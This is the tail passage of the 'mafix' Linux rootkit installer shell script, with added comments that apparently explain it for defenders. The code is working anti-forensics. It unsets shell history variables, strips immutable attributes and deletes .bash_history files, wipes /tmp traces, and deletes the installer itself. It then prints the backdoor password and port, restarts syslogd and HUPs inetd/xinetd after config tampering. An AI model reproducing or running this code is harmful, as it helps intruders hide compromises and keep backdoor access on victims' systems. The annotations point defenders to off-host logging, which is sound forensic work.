echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/redhat-release`${RES}"
elif [ -f /etc/slackware-version ]; then
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/slackware-version`${RES}"
elif [ -f /etc/debian_version ]; then
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/debian_version`${RES}"
elif [ -f /etc/SuSE-release ]; then
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/SuSE-release`${RES}"
elif [ -f /etc/issue ]; then
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/issue`${RES}"
else echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} unknown${RES}"
fi
echo
echo -n "${CYN}mafix!${DMAG} > cleaning up some traces... ${RES}"
# Anti-forensics: the history variables are unset so this shell session is not
# written to a history file, history files at / and /bin are deleted, /tmp/.r*
# is removed, and the installer deletes its own directory and archive
# (rm -rf mafix* from the parent directory). After a run, the installer itself
# will normally not be found on disk; the dropped files listed in the earlier
# sections are what remains. Shell history is not a reliable record here -
# process accounting or auditd logs shipped off-host are.
unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
if [ -f /.bash_history ]; then
chattr -isa /.bash_history >/dev/null 2>&1
rm -rf /.bash_history
fi
if [ -f /bin/.bash_history ]; then
chattr -isa /bin/.bash_history
rm -rf /bin/.bash_history
fi
cd $BASEDIR
rm -rf /tmp/.r*
cd ..
rm -rf mafix*
echo -n "${CYN}done!${RES}"
echo
rm -rf /tmp/info_tmp
# endtime is recorded but, like startime, never read in this script.
endtime=`date +%S`
echo
echo
# Closing banner, followed by the password and port as passed on the command
# line ($1/$2 are empty when the defaults were used).
echo "${CYN} ___ ___ ___ ${DMAG} ${CYN} ___ ${RES}"
echo "${CYN} /__/ / / / / ${DMAG} ___ ${CYN} /__/| ${RES}"
echo "${CYN} | |:: / /:: / /:/_ ${DMAG} / / ${CYN} | |:| ${RES}"
echo "${CYN} | |:|: / /:/: / /:/ / ${DMAG} / /:/ ${CYN} | |:| ${RES}"
echo "${CYN} __|__|:|: / /:/~/:: / /:/ /:/ ${DMAG}/__/:: ${CYN} __|__|:| ${RES}"
echo "${CYN} /__/::::| : /__/:/ /:/: /__/:/ /:/ ${DMAG}__/:__ ${CYN} /__/::::____${RES}"
echo "${CYN} :~~__/ :/:/__/ :/:/ ${DMAG} :/ ${CYN} ~~~::::/${RES}"
echo "${CYN} : ::/ ::/ ${DMAG} __::/${CYN} |~~|:|~~ ${RES}"
echo "${CYN} : : : ${DMAG} /__/:/ ${CYN} | |:| ${RES}"
echo "${CYN} : : : ${DMAG} __/ ${CYN} | |:| ${RES}"
echo "${CYN} __/ __/ __/ ${DMAG} ${CYN} |__|/ ${RES}"
echo "${DMAG}${RES}"
echo "${DMAG} Password: $1 ${RES}"
echo "${DMAG} Port: $2 ${RES}"
# Local logging is switched back on now that the install is finished.
# -m 0 starts syslogd with the periodic "-- MARK --" lines turned off. The
# window between the kill at the start and this restart shows up as a hole in
# the local logs; forwarding logs off-host keeps the records leading up to it.
if [ -f /usr/sbin/syslogd ]; then
/usr/sbin/syslogd -m 0
else
/sbin/syslogd -m 0
fi
# inetd/xinetd is sent SIGHUP so it re-reads its configuration, which was
# filtered earlier in the script.
if [ -f /usr/sbin/inetd ]; then
killall -HUP inetd >/dev/null 2>&1
elif [ -f /usr/sbin/xinetd ]; then
killall -HUP xinetd
fi